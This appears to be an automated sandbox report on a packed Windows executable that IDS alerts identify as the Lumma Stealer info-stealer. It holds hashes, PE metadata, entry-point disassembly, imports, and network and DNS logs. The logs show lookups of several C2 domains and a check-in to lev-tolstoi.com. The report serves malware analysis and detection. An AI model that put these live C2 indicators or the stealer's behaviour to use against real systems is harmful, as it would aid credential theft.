                                                                                                                                                                                                                                                      File size:295'424 bytes
                                                                                                                                                                                                                                                      MD5:7dc18a69dcdca002579bfde5d5427ff2
                                                                                                                                                                                                                                                      SHA1:3b305cb3e20e48cb0b0532185e49136511838987
                                                                                                                                                                                                                                                      SHA256:dbcd285bed7578f894354dd630c4be5cf9ffdf4d4e96b861937235466bc8fc29
                                                                                                                                                                                                                                                      SHA512:e0df240c7b3ccbd682b9b290eb03a5770a0ef2b8ab40d487119fb34456213ac890f441b307579e31d4207d68092061edab9b0adda9f9309dfc2fbd238768eb8d
                                                                                                                                                                                                                                                      SSDEEP:6144:+rF/ysYSR3gurbAjNlCitV5fVFbSCHp97JfS2hEru:+FKVSFbr8lCiD5NFbBRf9R
                                                                                                                                                                                                                                                      TLSH:CD54F12236E0C471D44741328975C771BA6FB4326A75898B33E413BEFF309A25A7E35A
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-,..-,..-,...,..-,...,..-,...,S.-,.)V,..-,..,,..-,...,..-,...,..-,...,..-,Rich..-,........................PE..L....N.f...
                                                                                                                                                                                                                                                      Icon Hash:63796de961476e0f
                                                                                                                                                                                                                                                      Entrypoint:0x404bae
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x66044ECA [Wed Mar 27 16:52:26 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                      Import Hash:dd6758145b1623dda9a99720fa5b9de8
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      call 00007FFA6D22DFC4h
                                                                                                                                                                                                                                                      jmp 00007FFA6D22911Dh
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      call 00007FFA6D2292DCh
                                                                                                                                                                                                                                                      xchg cl, ch
                                                                                                                                                                                                                                                      jmp 00007FFA6D2292C4h
                                                                                                                                                                                                                                                      call 00007FFA6D2292D3h
                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                      jmp 00007FFA6D2292BBh
                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                      mov ch, cl
                                                                                                                                                                                                                                                      xor cl, cl
                                                                                                                                                                                                                                                      jmp 00007FFA6D2292B1h
                                                                                                                                                                                                                                                      mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                      fpatan
                                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                                      je 00007FFA6D2292A6h
                                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                      je 00007FFA6D2292A4h
                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      fabs
                                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                                      fld st(0), st(0)
                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                      fsubrp st(1), st(0)
                                                                                                                                                                                                                                                      fxch st(0), st(1)
                                                                                                                                                                                                                                                      fld1
                                                                                                                                                                                                                                                      faddp st(1), st(0)
                                                                                                                                                                                                                                                      fmulp st(1), st(0)
                                                                                                                                                                                                                                                      ftst
                                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                                      fstsw word ptr [ebp-000000A0h]
                                                                                                                                                                                                                                                      wait
                                                                                                                                                                                                                                                      test byte ptr [ebp-0000009Fh], 00000001h
                                                                                                                                                                                                                                                      jne 00007FFA6D2292A7h
                                                                                                                                                                                                                                                      xor ch, ch
                                                                                                                                                                                                                                                      fsqrt
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      pop eax
                                                                                                                                                                                                                                                      jmp 00007FFA6D22E18Fh
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      fld tbyte ptr [00440D2Ah]
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      or cl, cl
                                                                                                                                                                                                                                                      je 00007FFA6D2292ADh
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      fldpi
                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                      je 00007FFA6D2292A4h
                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      fldz
                                                                                                                                                                                                                                                      or ch, ch
                                                                                                                                                                                                                                                      je 00007FFA6D229299h
                                                                                                                                                                                                                                                      fchs
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      jmp 00007FFA6D22E165h
                                                                                                                                                                                                                                                      fstp st(0)
                                                                                                                                                                                                                                                      mov cl, ch
                                                                                                                                                                                                                                                      jmp 00007FFA6D2292A2h
                                                                                                                                                                                                                                                      call 00007FFA6D22926Eh
                                                                                                                                                                                                                                                      jmp 00007FFA6D22E170h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      push ebp
                                                                                                                                                                                                                                                      mov ebp, esp
                                                                                                                                                                                                                                                      add esp, 00000030h
                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3ea000x28.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x4b0000x39d8.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2e600x40.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x18c.text
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x3e3080x3e4006e363f3bc9100a20c1425fa31fd3706aFalse0.8716624309738956data7.797011755872956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x400000xabfc0x6000d28a6abad1195a1eeae2070c43447a33False0.08203125data0.9737254719140257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .rsrc0x4b0000xa9d80x3a00ad84ff2cd0147f243263468ce4d5480fFalse0.4463227370689655data3.9297880019610165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_ICON0x4b1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.5368663594470046
                                                                                                                                                                                                                                                      RT_ICON0x4b1e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.5368663594470046
                                                                                                                                                                                                                                                      RT_ICON0x4b8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4101659751037344
                                                                                                                                                                                                                                                      RT_ICON0x4b8a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4101659751037344
                                                                                                                                                                                                                                                      RT_ICON0x4de500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.450354609929078
                                                                                                                                                                                                                                                      RT_ICON0x4de500x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.450354609929078
                                                                                                                                                                                                                                                      RT_STRING0x4e5400x496dataTamilIndia0.444633730834753
                                                                                                                                                                                                                                                      RT_STRING0x4e5400x496dataTamilSri Lanka0.444633730834753
                                                                                                                                                                                                                                                      RT_ACCELERATOR0x4e2e80x50dataTamilIndia0.825
                                                                                                                                                                                                                                                      RT_ACCELERATOR0x4e2e80x50dataTamilSri Lanka0.825
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x4e2b80x30dataTamilIndia0.9375
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x4e2b80x30dataTamilSri Lanka0.9375
                                                                                                                                                                                                                                                      RT_VERSION0x4e3380x208data0.5365384615384615
                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      KERNEL32.dllWriteConsoleInputW, SetComputerNameExA, EnumCalendarInfoW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, GetComputerNameW, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, VerifyVersionInfoA, FindNextVolumeMountPointW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, SetFileAttributesA, GetAtomNameA, LoadLibraryA, CreateSemaphoreW, InterlockedExchangeAdd, OpenEventA, GetCommMask, GlobalUnWire, FreeEnvironmentStringsW, EnumDateFormatsW, SetCalendarInfoA, GetVersionExA, TerminateJobObject, GetCurrentProcessId, FindNextVolumeA, MultiByteToWideChar, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, GetCPInfo, InterlockedIncrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, HeapFree, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, WriteFile, GetModuleFileNameA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapReAlloc, ReadFile, RtlUnwind, RaiseException, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, HeapSize, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA
                                                                                                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                      TamilIndia
                                                                                                                                                                                                                                                      TamilSri Lanka
                                                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                      2024-12-23T08:38:15.793341+01002058358ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crosshuaht .lat)1192.168.2.5498541.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:16.020160+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.5627271.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:16.241365+01002058360ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat)1192.168.2.5593341.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:16.468783+01002058370ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacebudi .lat)1192.168.2.5540521.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:16.889637+01002058362ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (energyaffai .lat)1192.168.2.5541901.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:17.278115+01002058354ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (aspecteirs .lat)1192.168.2.5555091.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:17.503964+01002058376ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sustainskelet .lat)1192.168.2.5557841.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:17.728617+01002058374ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rapeflowwj .lat)1192.168.2.5501561.1.1.153UDP
                                                                                                                                                                                                                                                      2024-12-23T08:38:19.493066+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                      2024-12-23T08:38:20.398145+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.54970423.55.153.106443TCP
                                                                                                                                                                                                                                                      2024-12-23T08:38:22.062968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                      2024-12-23T08:38:22.798773+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                      2024-12-23T08:38:22.798773+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.66.86443TCP
                                                                                                                                                                                                                                                      2024-12-23T08:38:23.761720+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.66.86443TCP
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.096765041 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.096875906 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.096976995 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.098483086 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.098520041 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.492903948 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.493066072 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.496633053 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.496643066 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.496906996 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.537687063 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.746431112 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:19.791331053 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398184061 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398210049 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398248911 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398264885 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398268938 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398289919 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398343086 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398406029 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398406029 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.398406029 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.575969934 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.576019049 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.576102018 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.576131105 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.576169968 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.606544018 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.606591940 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.606630087 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.606643915 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.606695890 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.608114004 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.608140945 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.608155966 CET49704443192.168.2.523.55.153.106
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.608163118 CET4434970423.55.153.106192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.843254089 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.843311071 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.843406916 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.843755007 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.843770027 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.062710047 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.062968016 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.065728903 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.065737963 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.066081047 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.067224026 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.067248106 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.067459106 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.798769951 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.798885107 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.798962116 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.802849054 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.802871943 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.802886009 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.802891970 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.836030006 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.836092949 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.836168051 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.836446047 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:22.836466074 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:23.761719942 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:15.793340921 CET4985453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.015830994 CET53498541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.020159960 CET6272753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.237737894 CET53627271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.241364956 CET5933453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.460222006 CET53593341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.468782902 CET5405253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.859289885 CET53540521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.889636993 CET5419053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.276228905 CET53541901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.278115034 CET5550953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.500688076 CET53555091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.503963947 CET5578453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.723517895 CET53557841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.728616953 CET5015653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.951376915 CET53501561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.954493999 CET5519153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.091398001 CET53551911.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.617142916 CET6235453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.842283010 CET53623541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:15.793340921 CET192.168.2.51.1.1.10x4889Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.020159960 CET192.168.2.51.1.1.10x3c6aStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.241364956 CET192.168.2.51.1.1.10xbf87Standard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.468782902 CET192.168.2.51.1.1.10x7c90Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.889636993 CET192.168.2.51.1.1.10xb69aStandard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.278115034 CET192.168.2.51.1.1.10x3790Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.503963947 CET192.168.2.51.1.1.10x2292Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.728616953 CET192.168.2.51.1.1.10xe3b7Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.954493999 CET192.168.2.51.1.1.10x4403Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.617142916 CET192.168.2.51.1.1.10x9352Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.015830994 CET1.1.1.1192.168.2.50x4889Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.237737894 CET1.1.1.1192.168.2.50x3c6aName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.460222006 CET1.1.1.1192.168.2.50xbf87Name error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:16.859289885 CET1.1.1.1192.168.2.50x7c90Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.276228905 CET1.1.1.1192.168.2.50xb69aName error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.500688076 CET1.1.1.1192.168.2.50x3790Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.723517895 CET1.1.1.1192.168.2.50x2292Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:17.951376915 CET1.1.1.1192.168.2.50xe3b7Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:18.091398001 CET1.1.1.1192.168.2.50x4403No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.842283010 CET1.1.1.1192.168.2.50x9352No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 23, 2024 08:38:20.842283010 CET1.1.1.1192.168.2.50x9352No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                      • lev-tolstoi.com
                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
